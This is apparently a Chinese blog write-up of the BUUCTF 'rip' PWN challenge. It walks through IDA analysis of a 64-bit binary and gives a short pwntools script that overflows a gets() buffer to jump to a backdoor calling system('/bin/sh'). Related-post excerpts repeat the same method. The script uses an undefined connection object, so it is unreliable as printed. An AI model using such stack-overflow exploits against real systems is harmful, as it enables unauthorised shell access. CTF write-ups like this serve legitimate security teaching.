BUUCTF-PWN-rip

最新推荐文章于 2025-11-23 16:31:16 发布
原创 最新推荐文章于 2025-11-23 16:31:16 发布 · 87 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章详细描述了一次PWN类型的CTF挑战,选手首先使用ida对二进制文件进行分析,找到关键函数fun的地址。然后,利用Python的pwn库构造payload,该payload包含填充字节和fun函数地址的低8位加1,最后将payload发送给服务器并进入交互模式进行进一步操作。

BUUCTF-PWN-rip

在这里插入图片描述

下载附件 checsec

在这里插入图片描述

	ida看看

在这里插入图片描述

shift+f12

在这里插入图片描述
双击fun

在这里插入图片描述

f5查看分析
在这里插入图片描述
在这里插入图片描述

 from pwn import * # 导入pwn库,提供一些常用的函数和类

elf = ELF("pwn1") # 加载二进制文件pwn1,获取其信息
fun_addr = elf.symbols['fun'] # 获取fun函数的地址
payload = b'M' * (0xf + 8) + p64(fun_addr + 1) # 构造payload,填充0xf+8个字节的M,然后加上fun函数地址的低8位+1(因为x86_64架构下,函数地址的最低位为0)
r.sendline(payload) # 发送payload给服务器
r.interactive() # 进入交互模式,可以和服务器进行交互
cdcdcdcd123132
关注
BUUCTF-Pwn-rip
餐桌上的猫
11-14 2999
题目截图 使用IDA打开附件,反汇编为C语言找到两个函数 可以看到主函数中定义了一个字符类型的变量s(这里IDA出了点问题,实际上应该是char s[15]),并使用gets()对其进行赋值,那么这里便存在栈溢出的漏洞,我们只需要想办法执行函数fun()就可以获得shell,进而获得flag,从IDA中可以看出定义s的大小为15个字节 所以到达到溢出的目标位置就需要填充15+8=23个字节,另外从IDA中可以看出fun()的起始地址为0x401186 所以我们可以构造payload=‘a’*23+
buuctf-rip
Nike_name的博客
06-13 850
利用get危险函数和system/bin/sh 的栈溢出
BUUCTF-PWN】2-rip
燕麦葡萄干的博客
07-04 296
64位rbp是8位,32位rbp是4位,堆栈平衡需要在后门函数地址+1。查看main函数,gets()存在栈溢出。64位,未开启任何保护。定位到后门函数的地址。
BUUCTF-PWN题详解(nc&rip
2302_80325559的博客
11-25 1995
这是C语言调用gets函数的过程绿色的直到return都是main函数的栈帧,下面的当然是gets函数。PWN题目涉及的知识太多了一篇文章讲不完,这次的知识都是恰好足以解决这两道题目的,如果展开首先我也说不太清楚(菜鸡哭哭 (╥﹏╥)),其次新手也听的吃力。IDA已经告诉我们s距离ebp的位置(此时ebp指向%ebp in caller)我们要填充15(Fh的十进制是15)个垃圾数据到达ebp然后再填充8个垃圾数据(ebp占8个字节)之后的数据就到了我们的return中。那不就意味着我们获得了权限。
pwn基础入门-buuctf-2.rip
weixin_49765221的博客
05-21 1650
将下载下来的pwn1文件内容,放到ubuntu中checksec一下。
[BUUCTF-PWN] rip
m0_46098032的博客
01-02 313
下载文件,checksec查看一下文件,64位文件,没有开启任何保护。 用IDA64位打开文件,反编译main函数,看到了gets函数,gets函数存在栈溢出漏洞。 双击s,可以看到现只需存入15个字节即可劫持函数返回地址。 我们同时可以看到存在一个fun函数。就是一个系统调用。 查看一下fun函数的地址,为0x401186 exp如下: from pwn import * p = remote('node4.buuoj.cn', :9228) payload = b.
[BUUCTF-pwn]——rip
Y_peak的博客
01-30 1419
BUUCTF——rip 题目地址:https://buuoj.cn/challenges 题目: 同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。???? (任何保护都没开,基本就是栈溢出) 在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数 看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西 赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 6713
BUU CTF PWN 入门知识详解
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1780
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
buuctf-pwn1-rip
hanjinming110的博客
11-23 699
本文分析了BUUCTF中的pwn1-rip题目。通过checksec和file命令发现这是一个64位动态链接程序,没有任何保护机制。使用IDA Pro分析发现main函数中存在gets漏洞,可向15字节的s数组写入任意数据。通过gdb动态调试确定偏移量为23字节。题目中存在可直接调用的system('/bin/sh')函数,构造payload成功获取shell。此外还介绍了当没有直接调用时如何通过ROPgadget查找pop rdi指令,考虑64位程序的栈对齐问题,构造包含返回地址、pop rdi、/bin
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8862
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
QSPI协议解析包(基于PulseView软件使用)
01-07
1. 在PulseView软件中,可用于解析QSPI协议 2. 当前作者只验证过QSPI的4线写指令、单线读指令,其他指令暂未验证。
基于YOLO的车辆测速系统.zip
01-07
基于YOLO的车辆测速系统.zip
最短路径 城市间最短路 乌鲁木齐 哈尔滨 呼和浩特 长春 北京
01-07
下载前可以先看下教程 https://pan.quark.cn/s/a4b39357ea24 Data-Structure 数据结构 VS2012
温度检测与控制实验-下载即用.zip
01-07
已经博主授权,源码转载自 https://pan.quark.cn/s/e1c190acf60b 基于LabVIEW的温度数据采集系统,其构成包含若干个不同的文件,这些资料源自其他渠道且质量较高,现将其提供予有需求者。
基于RF信号与YOLO的无人机检测分类系统.zip
01-07
基于RF信号与YOLO的无人机检测分类系统.zip
2026年最新整理50余份(PPT+WORD)合集城市生命线+数字管廊+数字管线+数字管道+数字管网+市政.rar
01-07
2026年最新整理50余份(PPT+WORD)合集城市生命线+数字管廊+数字管线+数字管道+数字管网+市政.rar
【无人机路径规划】基于粒子群算法PSO融合动态窗口法DWA的无人机三维动态避障路径规划研究(Matlab代码实现)
最新发布
01-07
【无人机路径规划】基于粒子群算法PSO融合动态窗口法DWA的无人机三维动态避障路径规划研究(Matlab代码实现)内容概要:本文研究了一种基于粒子群算法(PSO)融合动态窗口法(DWA)的无人机三维动态避障路径规划方法,并提供了Matlab代码实现。该方法结合PSO的全局搜索能力与DWA的局部实时避障优势,有效解决了复杂动态环境中无人机路径规划的安全性、实时性与最优性问题。文中详细阐述了算法的融合机制、三维空间建模、动态障碍物处理及仿真验证过程,展示了其在动态环境下的良好适应性和路径优化性能。; 适合人群:具备一定编程基础,熟悉Matlab工具,对智能优化算法和无人机路径规划有一定了解的研究生、科研人员及自动化、机器人、人工智能方向的研发工程师。; 使用场景及目标:①用于复杂三维动态环境下无人机自主导航与避障系统的设计与开发;②作为智能优化算法(如PSO)与局部避障算法(如DWA)融合策略的学习案例;③支持科研复现、课程项目设计及学术论文写作参考。; 阅读建议:建议结合提供的Matlab代码进行仿真实验,深入理解PSO与DWA的融合逻辑,关注算法参数设置对路径质量和实时性的影响,可进一步扩展至多无人机协同避障等应用场景。
计及光伏电站快速无功响应特性的分布式电源优化配置方法(Matlab代码实现)
01-07
计及光伏电站快速无功响应特性的分布式电源优化配置方法(Matlab代码实现)内容概要:本文提出了一种计及光伏电站快速无功响应特性的分布式电源优化配置方法,并提供了基于Matlab的代码实现。该方法在传统分布式电源配置基础上,充分考虑了光伏电站通过逆变器实现的快速无功调节能力,以提升配电网的电压稳定性与运行效率。通过建立包含有功、无功协调优化的数学模型,结合智能算法求解最优电源配置方案,有效降低了网络损耗,改善了节点电压质量,增强了系统对可再生能源的接纳能力。研究案例验证了所提方法在典型配电系统中的有效性与实用性。; 适合人群:具备电力系统基础知识和Matlab编程能力的电气工程专业研究生、科研人员及从事新能源并网、配电网规划的相关技术人员。; 使用场景及目标:①用于分布式光伏等新能源接入配电网的规划与优化设计;②提升配电网电压稳定性与电能质量;③研究光伏逆变器无功补偿能力在系统优化中的应用价值;④为含高比例可再生能源的主动配电网提供技术支持。; 阅读建议:建议读者结合Matlab代码与算法原理同步学习,重点理解目标函数构建、约束条件设定及优化算法实现过程,可通过修改系统参数和场景设置进行仿真对比,深入掌握方法的核心思想与工程应用潜力。
buuctf-pwn入门
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值